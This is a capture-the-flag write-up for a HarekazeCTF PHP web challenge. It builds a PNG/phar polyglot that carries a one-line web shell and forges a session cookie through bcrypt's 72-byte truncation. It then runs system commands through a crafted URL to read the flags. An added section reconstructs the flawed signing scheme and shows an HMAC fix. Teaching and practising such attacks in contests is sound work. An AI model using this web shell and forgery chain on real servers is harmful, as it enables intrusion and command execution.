- Bypass finfo and bypass the image size check.
- Upload a 0x10-byte PNG header; the size check is bypassed.
Payload: https://up.harold.kim/cvTUpPhrieW54Anu
- Flag: HarekazeCTF{seikai_wa_hitotsu!janai!!}
- We take the first file payload and save it as a.png.
- Generate the exploit phar file for the attack.
```php
<?php
// Read the PNG bytes and pad them with 32 NUL bytes; this becomes the phar stub,
// so the file still starts with a valid PNG header for the upload checks.
$a = fread(fopen("a.png", "rb"), filesize("a.png")) . str_repeat("\x00", 32);
$phar = new Phar('exploit.phar');
$phar->startBuffering();
// The file that will be included when the theme points into the phar.
$phar->addFromString('exploit.css', '<?php @var_dump($_GET[1]($_GET[2])); ?>');
// The stub must end with __HALT_COMPILER(); for Phar to accept it.
$phar->setStub($a . '<?php __HALT_COMPILER(); ?>');
//$phar->setMetadata($obj);
$phar->stopBuffering();
?>
```
- Upload the generated phar file.
http://153.127.202.154:1002/uploads/64f3139f.png
- Upload for flag1.
- You receive a session with flag1 in the flash message.
session=eyJuYW1lIjoiU1RZUFJTVFlQUlNUWVBSQSIsImZsYXNoIjp7InR5cGUiOiJlcnJvciIsIm1lc3NhZ2UiOiJXaGF0IGhhcHBlbmVkLi4uPyBPSywgdGhlIGZsYWcgZm9yIHBhcnQgMSBpczogPGNvZGU-SGFyZWthemVDVEZ7c2Vpa2FpX3dhX2hpdG90c3UhamFuYWkhIX08XC9jb2RlPiJ9fQ.JDJ5JDEwJHA1dWg0Njlia2N5bjZvL1p6aVdKNnVrQUxTckJKLkQwelVmUG1qTTZ2akVpc3hLNDFFU0hX
Now we modify the theme to point at the file uploaded in (3):
{"name":"STYPRSTYPRSTYPRA","flash":{"type":"error","message":"What happened...? OK, the flag for part 1 is: <code>HarekazeCTF{seikai_wa_hitotsu!janai!!}<\/code>"}, "theme": "phar://./uploads/64f3139f.png/exploit"}
- This works because crypt() with the default bcrypt settings only compares a limited length of input. Since we have a long secret, we can simply append our plaintext to the end of the session text and password_verify is bypassed.
```php
$a = password_hash(str_repeat("A", 128), PASSWORD_BCRYPT);
var_dump(password_verify(str_repeat("A", 256), $a)); // true: bcrypt only hashes the first 72 bytes of its input
```
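The truncation above is the whole reason the session tag could be forged. As an added example that is not part of the original writeup, the code below reconstructs the assumed weak scheme (tag = bcrypt(secret . payload)) beside an HMAC scheme that covers the full payload; the cookie layout, the secret value and the function names are assumptions, and it relies on PHP's silent 72-byte bcrypt truncation.

```php
<?php
// Added example, not from the original writeup. Shows why a bcrypt tag over
// (secret . payload) is forgeable once the secret alone fills bcrypt's
// 72-byte input window, and a signing scheme that covers the whole payload.
// The cookie layout, the secret value and the function names are assumptions.

$secret = str_repeat("S", 100); // assumed server secret, longer than 72 bytes

// Weak scheme (reconstructed from the writeup): tag = bcrypt(secret . payload).
// bcrypt hashes only the first 72 bytes of its input, so payload bytes after
// the secret never reach the hash and any payload verifies against the tag.
function weak_sign(string $secret, string $payload): string {
    return password_hash($secret . $payload, PASSWORD_BCRYPT);
}
function weak_verify(string $secret, string $payload, string $tag): bool {
    return password_verify($secret . $payload, $tag);
}

// Hardened scheme: HMAC-SHA256 over the full payload with the secret as key,
// compared with hash_equals() so the comparison takes constant time.
function hmac_sign(string $secret, string $payload): string {
    return hash_hmac('sha256', $payload, $secret);
}
function hmac_verify(string $secret, string $payload, string $tag): bool {
    return hash_equals(hash_hmac('sha256', $payload, $secret), $tag);
}

// Constructed session payloads: the server issued $original; $tampered is a
// client-side edit of it that should never verify.
$original = json_encode(['name' => 'user', 'theme' => 'light']);
$tampered = json_encode(['name' => 'user', 'theme' => 'tampered']);

$weakTag = weak_sign($secret, $original);
$hmacTag = hmac_sign($secret, $original);

printf("bcrypt tag accepts tampered payload: %s\n",
    var_export(weak_verify($secret, $tampered, $weakTag), true));
printf("HMAC tag accepts original payload:   %s\n",
    var_export(hmac_verify($secret, $original, $hmacTag), true));
printf("HMAC tag accepts tampered payload:   %s\n",
    var_export(hmac_verify($secret, $tampered, $hmacTag), true));
```

The same defect appears whenever bcrypt is used as a MAC over secret-prefixed data; a keyed hash such as HMAC, or a proper session library, is the fix.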
- Set the cookie.
```js
document.cookie="session=eyJuYW1lIjoiU1RZUFJTVFlQUlNUWVBSQSIsImZsYXNoIjp7InR5cGUiOiJlcnJvciIsIm1lc3NhZ2UiOiJXaGF0IGhhcHBlbmVkLi4uPyBPSywgdGhlIGZsYWcgZm9yIHBhcnQgMSBpczogPGNvZGU-SGFyZWthemVDVEZ7c2Vpa2FpX3dhX2hpdG90c3UhamFuYWkhIX08XC9jb2RlPiJ9LCAidGhlbWUiOiAicGhhcjovLy4vdXBsb2Fkcy82NGYzMTM5Zi5wbmcvZXhwbG9pdCJ9" +".JDJ5JDEwJHA1dWg0Njlia2N5bjZvL1p6aVdKNnVrQUxTckJKLkQwelVmUG1qTTZ2akVpc3hLNDFFU0hX";
```
- Access http://153.127.202.154:1002/?1=system&2=cat+/flag2-dea5b73356499c78
```
...
vertical-align: middle;
}
/* light/dark.css */
HarekazeCTF{lfi_with_phar_is_fun}
string(33) "HarekazeCTF{lfi_with_phar_is_fun}"
/**/
</style>
...
```
I thought too deeply about it; I also bypassed it with zip:// too. orz